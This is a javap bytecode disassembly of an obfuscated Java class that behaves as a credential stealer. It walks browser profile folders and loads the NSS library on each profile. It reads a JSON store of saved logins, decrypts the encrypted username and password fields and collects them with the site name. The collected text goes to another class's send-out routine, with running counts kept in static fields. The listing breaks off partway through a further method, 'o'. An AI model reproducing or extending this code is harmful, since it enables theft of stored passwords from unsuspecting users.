Compiled from "ze.java"
public class a.b.d.ze {
  private static final java.lang.String v;

  private static final java.lang.String M;

  private static int q;

  private static int w;

  private static int c;

  private static final java.lang.String[] a;

  private static final java.lang.String[] b;

  private static final long d;

  private static final long e;

  public a.b.d.ze();
    Code:
         0: aload_0
         1: invokespecial #292                // Method java/lang/Object."<init>":()V
         4: return

  public static void r();
    Code:
         0: ldc2_w        #423                // long 53162376946671l
         3: lstore_0
         4: lload_0
         5: dup2
         6: ldc2_w        #425                // long 8868866167613l
         9: lxor
        10: lstore_2
        11: pop2
        12: iconst_0
        13: putstatic     #215                // Field q:I
        16: iconst_0
        17: putstatic     #53                 // Field w:I
        20: iconst_0
        21: putstatic     #393                // Field c:I
        24: ldc           #12                 // int 728224920
        26: sipush        28213
        29: iadd
        30: ldc           #18                 // int -728224920
        32: sipush        -23717
        35: i2c
        36: ineg
        37: iadd
        38: lload_0
        39: l2i
        40: invokestatic  #313                // Method a:(III)Ljava/lang/String;
        43: invokestatic  #373                // Method a/b/d/dec.k:(Ljava/lang/String;)V
        46: lload_2
        47: iconst_1
        48: anewarray     #319                // class java/lang/Object
        51: dup_x2
        52: dup_x2
        53: pop
        54: invokestatic  #322                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
        57: iconst_0
        58: swap
        59: aastore
        60: invokestatic  #144                // Method K:([Ljava/lang/Object;)V
        63: ldc           #12                 // int 728224920
        65: sipush        28249
        68: iadd
        69: ldc           #18                 // int -728224920
        71: sipush        -32586
        74: iadd
        75: lload_0
        76: l2i
        77: invokestatic  #313                // Method a:(III)Ljava/lang/String;
        80: ldc           #12                 // int 728224920
        82: sipush        28203
        85: iadd
        86: ldc           #12                 // int 728224920
        88: sipush        -28461
        91: i2c
        92: iadd
        93: lload_0
        94: l2i
        95: invokestatic  #313                // Method a:(III)Ljava/lang/String;
        98: getstatic     #215                // Field q:I
       101: invokestatic  #78                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       104: ldc           #12                 // int 728224920
       106: sipush        28216
       109: iadd
       110: ldc           #18                 // int -728224920
       112: sipush        -22627
       115: i2c
       116: ineg
       117: iadd
       118: lload_0
       119: l2i
       120: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       123: ldc           #12                 // int 728224920
       125: sipush        28222
       128: iadd
       129: ldc           #18                 // int -728224920
       131: sipush        -29210
       134: i2c
       135: ineg
       136: iadd
       137: lload_0
       138: l2i
       139: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       142: getstatic     #53                 // Field w:I
       145: invokestatic  #78                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       148: ldc           #12                 // int 728224920
       150: sipush        28216
       153: iadd
       154: ldc           #18                 // int -728224920
       156: sipush        -22627
       159: i2c
       160: ineg
       161: iadd
       162: lload_0
       163: l2i
       164: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       167: ldc           #12                 // int 728224920
       169: sipush        28230
       172: iadd
       173: ldc           #18                 // int -728224920
       175: sipush        -25252
       178: i2c
       179: ineg
       180: iadd
       181: lload_0
       182: l2i
       183: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       186: getstatic     #393                // Field c:I
       189: invokestatic  #78                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       192: return

  private static void K(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #45                 // class java/lang/Long
         7: invokevirtual #202                // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: pop
        12: lload_1
        13: dup2
        14: ldc2_w        #419                // long 130563046457852l
        17: lxor
        18: lstore_3
        19: pop2
        20: getstatic     #290                // Field a/b/d/dec$NssSec.m:Z
        23: new           #221                // class java/io/File
        26: dup
        27: getstatic     #338                // Field M:Ljava/lang/String;
        30: invokespecial #247                // Method java/io/File."<init>":(Ljava/lang/String;)V
        33: astore        6
        35: istore        5
        37: aload         6
        39: iload         5
        41: ifne          58
        44: invokevirtual #136                // Method java/io/File.exists:()Z
        47: ifne          56
        50: goto          54
        53: athrow
        54: return
        55: athrow
        56: aload         6
        58: invokedynamic #111,  0            // InvokeDynamic #0:accept:()Ljava/io/FileFilter;
        63: invokevirtual #155                // Method java/io/File.listFiles:(Ljava/io/FileFilter;)[Ljava/io/File;
        66: astore        7
        68: aload         7
        70: iload         5
        72: ifne          85
        75: ifnonnull     83
        78: goto          82
        81: athrow
        82: return
        83: aload         7
        85: astore        8
        87: aload         8
        89: arraylength
        90: istore        9
        92: iconst_0
        93: istore        10
        95: iload         10
        97: iload         9
        99: if_icmpge     152
       102: aload         8
       104: iload         10
       106: aaload
       107: astore        11
       109: lload_3
       110: aload         11
       112: iconst_2
       113: anewarray     #319                // class java/lang/Object
       116: dup_x1
       117: swap
       118: iconst_1
       119: swap
       120: aastore
       121: dup_x2
       122: dup_x2
       123: pop
       124: invokestatic  #322                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       127: iconst_0
       128: swap
       129: aastore
       130: invokestatic  #389                // Method A:([Ljava/lang/Object;)V
       133: getstatic     #357                // Field e:J
       136: invokestatic  #345                // Method java/lang/Thread.sleep:(J)V
       139: goto          144
       142: astore        12
       144: iinc          10, 1
       147: iload         5
       149: ifeq          95
       152: return
      Exception table:
         from    to  target type
            68    78    81   Class java/lang/Exception
            44    55    55   Class java/lang/Exception
            37    50    53   Class java/lang/Exception
           133   139   142   Class java/lang/Exception

  private static void A(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #45                 // class java/lang/Long
         7: invokevirtual #202                // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: dup
        12: iconst_1
        13: aaload
        14: checkcast     #221                // class java/io/File
        17: astore_3
        18: pop
        19: lload_1
        20: dup2
        21: ldc2_w        #427                // long 125108793325086l
        24: lxor
        25: lstore        4
        27: dup2
        28: ldc2_w        #421                // long 126156538644450l
        31: lxor
        32: lstore        6
        34: pop2
        35: getstatic     #290                // Field a/b/d/dec$NssSec.m:Z
        38: aload_3
        39: invokevirtual #375                // Method java/io/File.getName:()Ljava/lang/String;
        42: astore        9
        44: istore        8
        46: new           #221                // class java/io/File
        49: dup
        50: aload_3
        51: ldc           #22                 // int -822726390
        53: sipush        -8426
        56: i2c
        57: ineg
        58: isub
        59: ldc           #16                 // int 822726390
        61: sipush        -9443
        64: i2c
        65: isub
        66: lload_1
        67: l2i
        68: invokestatic  #313                // Method a:(III)Ljava/lang/String;
        71: invokespecial #312                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        74: iload         8
        76: ifne          395
        79: invokevirtual #136                // Method java/io/File.exists:()Z
        82: ifne          126
        85: new           #221                // class java/io/File
        88: dup
        89: aload_3
        90: ldc           #22                 // int -822726390
        92: sipush        -8447
        95: i2c
        96: ineg
        97: isub
        98: ldc           #7                  // int -822595320
       100: sipush        -18244
       103: i2c
       104: ineg
       105: iadd
       106: lload_1
       107: l2i
       108: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       111: invokespecial #312                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       114: iload         8
       116: ifne          395
       119: invokevirtual #136                // Method java/io/File.exists:()Z
       122: ifne          126
       125: return
       126: aload_3
       127: lload         6
       129: aload         9
       131: iconst_3
       132: anewarray     #319                // class java/lang/Object
       135: dup_x1
       136: swap
       137: iconst_2
       138: swap
       139: aastore
       140: dup_x2
       141: dup_x2
       142: pop
       143: invokestatic  #322                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       146: iconst_1
       147: swap
       148: aastore
       149: dup_x1
       150: swap
       151: iconst_0
       152: swap
       153: aastore
       154: invokestatic  #68                 // Method G:([Ljava/lang/Object;)V
       157: aload_3
       158: lload         4
       160: ldc           #22                 // int -822726390
       162: sipush        -8450
       165: i2c
       166: ineg
       167: isub
       168: ldc           #7                  // int -822595320
       170: sipush        -17005
       173: i2c
       174: ineg
       175: iadd
       176: lload_1
       177: l2i
       178: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       181: ldc           #22                 // int -822726390
       183: sipush        -8457
       186: i2c
       187: ineg
       188: isub
       189: ldc           #22                 // int -822726390
       191: sipush        -3201
       194: i2c
       195: ineg
       196: isub
       197: lload_1
       198: l2i
       199: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       202: aload         9
       204: ldc           #22                 // int -822726390
       206: sipush        -8454
       209: i2c
       210: ineg
       211: isub
       212: ldc           #7                  // int -822595320
       214: sipush        -14558
       217: i2c
       218: ineg
       219: iadd
       220: lload_1
       221: l2i
       222: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       225: iconst_1
       226: bipush        7
       228: anewarray     #319                // class java/lang/Object
       231: dup_x1
       232: swap
       233: invokestatic  #298                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       236: bipush        6
       238: swap
       239: aastore
       240: dup_x1
       241: swap
       242: iconst_5
       243: swap
       244: aastore
       245: dup_x1
       246: swap
       247: iconst_4
       248: swap
       249: aastore
       250: dup_x1
       251: swap
       252: iconst_3
       253: swap
       254: aastore
       255: dup_x1
       256: swap
       257: iconst_2
       258: swap
       259: aastore
       260: dup_x2
       261: dup_x2
       262: pop
       263: invokestatic  #322                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       266: iconst_1
       267: swap
       268: aastore
       269: dup_x1
       270: swap
       271: iconst_0
       272: swap
       273: aastore
       274: invokestatic  #392                // Method o:([Ljava/lang/Object;)V
       277: aload_3
       278: lload         4
       280: ldc           #22                 // int -822726390
       282: sipush        -8438
       285: i2c
       286: ineg
       287: isub
       288: ldc           #16                 // int 822726390
       290: sipush        -10844
       293: i2c
       294: isub
       295: lload_1
       296: l2i
       297: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       300: ldc           #22                 // int -822726390
       302: sipush        -8451
       305: i2c
       306: ineg
       307: isub
       308: ldc           #16                 // int 822726390
       310: sipush        -6132
       313: i2c
       314: isub
       315: lload_1
       316: l2i
       317: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       320: aload         9
       322: ldc           #22                 // int -822726390
       324: sipush        -8442
       327: i2c
       328: ineg
       329: isub
       330: ldc           #16                 // int 822726390
       332: sipush        -10758
       335: i2c
       336: isub
       337: lload_1
       338: l2i
       339: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       342: iconst_2
       343: bipush        7
       345: anewarray     #319                // class java/lang/Object
       348: dup_x1
       349: swap
       350: invokestatic  #298                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       353: bipush        6
       355: swap
       356: aastore
       357: dup_x1
       358: swap
       359: iconst_5
       360: swap
       361: aastore
       362: dup_x1
       363: swap
       364: iconst_4
       365: swap
       366: aastore
       367: dup_x1
       368: swap
       369: iconst_3
       370: swap
       371: aastore
       372: dup_x1
       373: swap
       374: iconst_2
       375: swap
       376: aastore
       377: dup_x2
       378: dup_x2
       379: pop
       380: invokestatic  #322                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       383: iconst_1
       384: swap
       385: aastore
       386: dup_x1
       387: swap
       388: iconst_0
       389: swap
       390: aastore
       391: invokestatic  #392                // Method o:([Ljava/lang/Object;)V
       394: aload_3
       395: lload         4
       397: ldc           #22                 // int -822726390
       399: sipush        -8453
       402: i2c
       403: ineg
       404: isub
       405: ldc           #16                 // int 822726390
       407: sipush        -5597
       410: i2c
       411: isub
       412: lload_1
       413: l2i
       414: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       417: ldc           #22                 // int -822726390
       419: sipush        -8428
       422: i2c
       423: ineg
       424: isub
       425: ldc           #16                 // int 822726390
       427: sipush        -3404
       430: i2c
       431: isub
       432: lload_1
       433: l2i
       434: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       437: aload         9
       439: ldc           #22                 // int -822726390
       441: sipush        -8458
       444: i2c
       445: ineg
       446: isub
       447: ldc           #3                  // int 822595320
       449: sipush        -164
       452: i2c
       453: iadd
       454: lload_1
       455: l2i
       456: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       459: iconst_3
       460: bipush        7
       462: anewarray     #319                // class java/lang/Object
       465: dup_x1
       466: swap
       467: invokestatic  #298                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       470: bipush        6
       472: swap
       473: aastore
       474: dup_x1
       475: swap
       476: iconst_5
       477: swap
       478: aastore
       479: dup_x1
       480: swap
       481: iconst_4
       482: swap
       483: aastore
       484: dup_x1
       485: swap
       486: iconst_3
       487: swap
       488: aastore
       489: dup_x1
       490: swap
       491: iconst_2
       492: swap
       493: aastore
       494: dup_x2
       495: dup_x2
       496: pop
       497: invokestatic  #322                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       500: iconst_1
       501: swap
       502: aastore
       503: dup_x1
       504: swap
       505: iconst_0
       506: swap
       507: aastore
       508: invokestatic  #392                // Method o:([Ljava/lang/Object;)V
       511: return

  private static void G(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #221                // class java/io/File
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #45                 // class java/lang/Long
        14: invokevirtual #202                // Method java/lang/Long.longValue:()J
        17: lstore_2
        18: dup
        19: iconst_2
        20: aaload
        21: checkcast     #48                 // class java/lang/String
        24: astore        4
        26: pop
        27: getstatic     #290                // Field a/b/d/dec$NssSec.m:Z
        30: new           #221                // class java/io/File
        33: dup
        34: aload_1
        35: ldc           #14                 // int -715511130
        37: sipush        -4783
        40: i2c
        41: ineg
        42: isub
        43: ldc           #17                 // int 715380060
        45: sipush        -5410
        48: i2c
        49: iadd
        50: lload_2
        51: l2i
        52: invokestatic  #313                // Method a:(III)Ljava/lang/String;
        55: invokespecial #312                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        58: astore        6
        60: iconst_3
        61: anewarray     #48                 // class java/lang/String
        64: dup
        65: iconst_0
        66: ldc           #14                 // int -715511130
        68: sipush        -4819
        71: i2c
        72: ineg
        73: isub
        74: ldc           #17                 // int 715380060
        76: sipush        -20342
        79: i2c
        80: iadd
        81: lload_2
        82: l2i
        83: invokestatic  #313                // Method a:(III)Ljava/lang/String;
        86: invokestatic  #361                // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
        89: ldc           #14                 // int -715511130
        91: sipush        -4816
        94: i2c
        95: ineg
        96: isub
        97: ldc           #14                 // int -715511130
        99: sipush        -8819
       102: i2c
       103: ineg
       104: isub
       105: lload_2
       106: l2i
       107: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       110: invokedynamic #37,  0             // InvokeDynamic #1:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       115: aastore
       116: dup
       117: iconst_1
       118: ldc           #14                 // int -715511130
       120: sipush        -4815
       123: i2c
       124: ineg
       125: isub
       126: ldc           #9                  // int -715380060
       128: sipush        -1895
       131: i2c
       132: ineg
       133: iadd
       134: lload_2
       135: l2i
       136: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       139: invokestatic  #361                // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
       142: ldc           #14                 // int -715511130
       144: sipush        -4781
       147: i2c
       148: ineg
       149: isub
       150: ldc           #17                 // int 715380060
       152: sipush        -13258
       155: i2c
       156: iadd
       157: lload_2
       158: l2i
       159: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       162: invokedynamic #37,  0             // InvokeDynamic #1:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       167: aastore
       168: dup
       169: iconst_2
       170: ldc           #14                 // int -715511130
       172: sipush        -4823
       175: i2c
       176: ineg
       177: isub
       178: ldc           #14                 // int -715511130
       180: sipush        -9847
       183: i2c
       184: ineg
       185: isub
       186: lload_2
       187: l2i
       188: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       191: invokestatic  #361                // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
       194: ldc           #14                 // int -715511130
       196: sipush        -4825
       199: i2c
       200: ineg
       201: isub
       202: ldc           #9                  // int -715380060
       204: sipush        -13620
       207: i2c
       208: ineg
       209: iadd
       210: lload_2
       211: l2i
       212: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       215: invokedynamic #394,  0            // InvokeDynamic #2:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       220: aastore
       221: invokestatic  #255                // Method a/b/d/dec.nssLoad:([Ljava/lang/String;)La/b/d/dec$NssLib;
       224: astore        7
       226: istore        5
       228: aload         6
       230: invokevirtual #136                // Method java/io/File.exists:()Z
       233: ifeq          254
       236: aload         7
       238: iload         5
       240: ifne          257
       243: goto          247
       246: athrow
       247: ifnonnull     255
       250: goto          254
       253: athrow
       254: return
       255: aload         7
       257: aload_1
       258: invokevirtual #408                // Method java/io/File.getAbsolutePath:()Ljava/lang/String;
       261: invokestatic  #141                // Method a/b/d/dec.nssInit:(La/b/d/dec$NssLib;Ljava/lang/String;)Z
       264: ifne          268
       267: return
       268: new           #84                 // class java/lang/StringBuilder
       271: dup
       272: invokespecial #368                // Method java/lang/StringBuilder."<init>":()V
       275: astore        8
       277: aload         6
       279: invokevirtual #236                // Method java/io/File.toPath:()Ljava/nio/file/Path;
       282: invokestatic  #192                // Method java/nio/file/Files.readString:(Ljava/nio/file/Path;)Ljava/lang/String;
       285: invokestatic  #374                // Method com/google/gson/JsonParser.parseString:(Ljava/lang/String;)Lcom/google/gson/JsonElement;
       288: invokevirtual #269                // Method com/google/gson/JsonElement.getAsJsonObject:()Lcom/google/gson/JsonObject;
       291: astore        9
       293: aload         9
       295: ldc           #14                 // int -715511130
       297: sipush        -4821
       300: i2c
       301: ineg
       302: isub
       303: ldc           #17                 // int 715380060
       305: sipush        -10553
       308: i2c
       309: iadd
       310: lload_2
       311: l2i
       312: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       315: iload         5
       317: ifne          356
       320: invokevirtual #194                // Method com/google/gson/JsonObject.has:(Ljava/lang/String;)Z
       323: ifeq          362
       326: goto          330
       329: athrow
       330: aload         9
       332: ldc           #14                 // int -715511130
       334: sipush        -4821
       337: i2c
       338: ineg
       339: isub
       340: ldc           #17                 // int 715380060
       342: sipush        -10553
       345: i2c
       346: iadd
       347: lload_2
       348: l2i
       349: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       352: goto          356
       355: athrow
       356: invokevirtual #118                // Method com/google/gson/JsonObject.getAsJsonArray:(Ljava/lang/String;)Lcom/google/gson/JsonArray;
       359: goto          363
       362: aconst_null
       363: astore        10
       365: iload         5
       367: lload_2
       368: lconst_0
       369: lcmp
       370: ifle          956
       373: ifne          945
       376: aload         10
       378: ifnull        931
       381: goto          385
       384: athrow
       385: aload         10
       387: invokevirtual #296                // Method com/google/gson/JsonArray.iterator:()Ljava/util/Iterator;
       390: astore        11
       392: aload         11
       394: invokeinterface #89,  1           // InterfaceMethod java/util/Iterator.hasNext:()Z
       399: ifeq          931
       402: aload         11
       404: invokeinterface #326,  1          // InterfaceMethod java/util/Iterator.next:()Ljava/lang/Object;
       409: checkcast     #36                 // class com/google/gson/JsonElement
       412: astore        12
       414: aload         12
       416: invokevirtual #269                // Method com/google/gson/JsonElement.getAsJsonObject:()Lcom/google/gson/JsonObject;
       419: astore        13
       421: lload_2
       422: lconst_0
       423: lcmp
       424: ifle          945
       427: aload         7
       429: iload         5
       431: ifne          939
       434: aload         13
       436: lload_2
       437: lconst_0
       438: lcmp
       439: ifle          511
       442: ldc           #14                 // int -715511130
       444: sipush        -4832
       447: i2c
       448: ineg
       449: isub
       450: ldc           #2                  // int 715511130
       452: sipush        -9174
       455: i2c
       456: isub
       457: lload_2
       458: l2i
       459: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       462: iload         5
       464: ifne          508
       467: goto          471
       470: athrow
       471: invokevirtual #194                // Method com/google/gson/JsonObject.has:(Ljava/lang/String;)Z
       474: ifeq          517
       477: goto          481
       480: athrow
       481: aload         13
       483: ldc           #14                 // int -715511130
       485: sipush        -4831
       488: i2c
       489: ineg
       490: isub
       491: ldc           #9                  // int -715380060
       493: sipush        -18703
       496: i2c
       497: ineg
       498: iadd
       499: lload_2
       500: l2i
       501: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       504: goto          508
       507: athrow
       508: invokevirtual #381                // Method com/google/gson/JsonObject.get:(Ljava/lang/String;)Lcom/google/gson/JsonElement;
       511: invokevirtual #369                // Method com/google/gson/JsonElement.getAsString:()Ljava/lang/String;
       514: goto          519
       517: ldc           #6                  // String
       519: invokestatic  #64                 // Method a/b/d/dec.nssDecrypt:(La/b/d/dec$NssLib;Ljava/lang/String;)Ljava/lang/String;
       522: astore        14
       524: aload         7
       526: aload         13
       528: lload_2
       529: lconst_0
       530: lcmp
       531: ifle          599
       534: ldc           #14                 // int -715511130
       536: sipush        -4779
       539: i2c
       540: ineg
       541: isub
       542: ldc           #2                  // int 715511130
       544: sipush        -1499
       547: i2c
       548: isub
       549: lload_2
       550: l2i
       551: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       554: iload         5
       556: ifne          596
       559: invokevirtual #194                // Method com/google/gson/JsonObject.has:(Ljava/lang/String;)Z
       562: ifeq          605
       565: goto          569
       568: athrow
       569: aload         13
       571: ldc           #14                 // int -715511130
       573: sipush        -4822
       576: i2c
       577: ineg
       578: isub
       579: ldc           #14                 // int -715511130
       581: sipush        -3864
       584: i2c
       585: ineg
       586: isub
       587: lload_2
       588: l2i
       589: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       592: goto          596
       595: athrow
       596: invokevirtual #381                // Method com/google/gson/JsonObject.get:(Ljava/lang/String;)Lcom/google/gson/JsonElement;
       599: invokevirtual #369                // Method com/google/gson/JsonElement.getAsString:()Ljava/lang/String;
       602: goto          607
       605: ldc           #6                  // String
       607: invokestatic  #64                 // Method a/b/d/dec.nssDecrypt:(La/b/d/dec$NssLib;Ljava/lang/String;)Ljava/lang/String;
       610: astore        15
       612: aload         14
       614: iload         5
       616: lload_2
       617: lconst_0
       618: lcmp
       619: ifle          642
       622: ifne          634
       625: ifnull        926
       628: goto          632
       631: athrow
       632: aload         15
       634: lload_2
       635: lconst_0
       636: lcmp
       637: iflt          654
       640: iload         5
       642: ifne          654
       645: ifnull        926
       648: goto          652
       651: athrow
       652: aload         15
       654: invokevirtual #346                // Method java/lang/String.isEmpty:()Z
       657: lload_2
       658: lconst_0
       659: lcmp
       660: iflt          684
       663: iload         5
       665: ifne          684
       668: ifne          926
       671: goto          675
       674: athrow
       675: getstatic     #53                 // Field w:I
       678: iconst_1
       679: iadd
       680: goto          684
       683: athrow
       684: putstatic     #53                 // Field w:I
       687: aload         8
       689: ldc           #14                 // int -715511130
       691: sipush        -4798
       694: i2c
       695: ineg
       696: isub
       697: ldc           #17                 // int 715380060
       699: sipush        -3850
       702: i2c
       703: iadd
       704: lload_2
       705: l2i
       706: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       709: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       712: aload         13
       714: lload_2
       715: lconst_0
       716: lcmp
       717: iflt          785
       720: ldc           #14                 // int -715511130
       722: sipush        -4789
       725: i2c
       726: ineg
       727: isub
       728: ldc           #2                  // int 715511130
       730: sipush        -8388
       733: i2c
       734: isub
       735: lload_2
       736: l2i
       737: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       740: iload         5
       742: ifne          782
       745: invokevirtual #194                // Method com/google/gson/JsonObject.has:(Ljava/lang/String;)Z
       748: ifeq          791
       751: goto          755
       754: athrow
       755: aload         13
       757: ldc           #14                 // int -715511130
       759: sipush        -4826
       762: i2c
       763: ineg
       764: isub
       765: ldc           #9                  // int -715380060
       767: sipush        -2419
       770: i2c
       771: ineg
       772: iadd
       773: lload_2
       774: l2i
       775: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       778: goto          782
       781: athrow
       782: invokevirtual #381                // Method com/google/gson/JsonObject.get:(Ljava/lang/String;)Lcom/google/gson/JsonElement;
       785: invokevirtual #369                // Method com/google/gson/JsonElement.getAsString:()Ljava/lang/String;
       788: goto          793
       791: ldc           #6                  // String
       793: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       796: ldc           #14                 // int -715511130
       798: sipush        -4802
       801: i2c
       802: ineg
       803: isub
       804: lload_2
       805: lconst_0
       806: lcmp
       807: iflt          835
       810: ldc           #17                 // int 715380060
       812: sipush        -17474
       815: i2c
       816: iadd
       817: lload_2
       818: l2i
       819: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       822: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       825: aload         14
       827: iload         5
       829: ifne          866
       832: invokevirtual #346                // Method java/lang/String.isEmpty:()Z
       835: ifeq          869
       838: goto          842
       841: athrow
       842: ldc           #14                 // int -715511130
       844: sipush        -4805
       847: i2c
       848: ineg
       849: isub
       850: ldc           #17                 // int 715380060
       852: sipush        -10014
       855: i2c
       856: iadd
       857: lload_2
       858: l2i
       859: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       862: goto          866
       865: athrow
       866: goto          871
       869: aload         14
       871: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       874: ldc           #14                 // int -715511130
       876: sipush        -4833
       879: i2c
       880: ineg
       881: isub
       882: ldc           #17                 // int 715380060
       884: sipush        -6855
       887: i2c
       888: iadd
       889: lload_2
       890: l2i
       891: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       894: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       897: aload         15
       899: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       902: ldc           #14                 // int -715511130
       904: sipush        -4786
       907: i2c
       908: ineg
       909: isub
       910: ldc           #17                 // int 715380060
       912: sipush        -307
       915: i2c
       916: iadd
       917: lload_2
       918: l2i
       919: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       922: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       925: pop
       926: iload         5
       928: ifeq          392
       931: lload_2
       932: lconst_0
       933: lcmp
       934: ifle          945
       937: aload         7
       939: invokeinterface #173,  1          // InterfaceMethod a/b/d/dec$NssLib.NSS_Shutdown:()I
       944: pop
       945: lload_2
       946: lconst_0
       947: lcmp
       948: ifle          1022
       951: aload         8
       953: invokevirtual #122                // Method java/lang/StringBuilder.length:()I
       956: ifle          1026
       959: aload         4
       961: ldc           #14                 // int -715511130
       963: sipush        -4828
       966: i2c
       967: ineg
       968: isub
       969: ldc           #14                 // int -715511130
       971: sipush        -852
       974: i2c
       975: ineg
       976: isub
       977: lload_2
       978: l2i
       979: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       982: swap
       983: ldc           #14                 // int -715511130
       985: sipush        -4824
       988: i2c
       989: ineg
       990: isub
       991: ldc           #17                 // int 715380060
       993: sipush        -4374
       996: i2c
       997: iadd
       998: lload_2
       999: l2i
      1000: invokestatic  #313                // Method a:(III)Ljava/lang/String;
      1003: invokedynamic #413,  0            // InvokeDynamic #3:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
      1008: aload         8
      1010: invokevirtual #50                 // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
      1013: getstatic     #106                // Field java/nio/charset/StandardCharsets.UTF_8:Ljava/nio/charset/Charset;
      1016: invokevirtual #302                // Method java/lang/String.getBytes:(Ljava/nio/charset/Charset;)[B
      1019: invokestatic  #159                // Method a/b/c/z.a:(Ljava/lang/String;[B)V
      1022: goto          1026
      1025: athrow
      1026: goto          1031
      1029: astore        8
      1031: return
      Exception table:
         from    to  target type
           236   250   253   Class java/lang/Exception
           228   243   246   Class java/lang/Exception
           255   267  1029   Class java/lang/Exception
           945  1022  1025   Class java/lang/Exception
           832   862   865   Class java/lang/Exception
           793   838   841   Class java/lang/Exception
           745   778   781   Class java/lang/Exception
           684   751   754   Class java/lang/Exception
           668   680   683   Class java/lang/Exception
           654   671   674   Class java/lang/Exception
           634   648   651   Class java/lang/Exception
           612   628   631   Class java/lang/Exception
           559   592   595   Class java/lang/Exception
           524   565   568   Class java/lang/Exception
           471   504   507   Class java/lang/Exception
           434   477   480   Class java/lang/Exception
           421   467   470   Class java/lang/Exception
           365   381   384   Class java/lang/Exception
           320   352   355   Class java/lang/Exception
           293   326   329   Class java/lang/Exception
           268  1026  1029   Class java/lang/Exception

  private static void o(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #221                // class java/io/File
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #45                 // class java/lang/Long
        14: invokevirtual #202                // Method java/lang/Long.longValue:()J
        17: lstore_2
        18: dup
        19: iconst_2
        20: aaload
        21: checkcast     #48                 // class java/lang/String
        24: astore        4
        26: dup
        27: iconst_3
        28: aaload
        29: checkcast     #48                 // class java/lang/String
        32: astore        5
        34: dup
        35: iconst_4
        36: aaload
        37: checkcast     #48                 // class java/lang/String
        40: astore        6
        42: dup
        43: iconst_5
        44: aaload
        45: checkcast     #48                 // class java/lang/String
        48: astore        7
        50: dup
        51: bipush        6
        53: aaload
        54: checkcast     #178                // class java/lang/Integer
        57: invokevirtual #186                // Method java/lang/Integer.intValue:()I
        60: istore        8
        62: pop
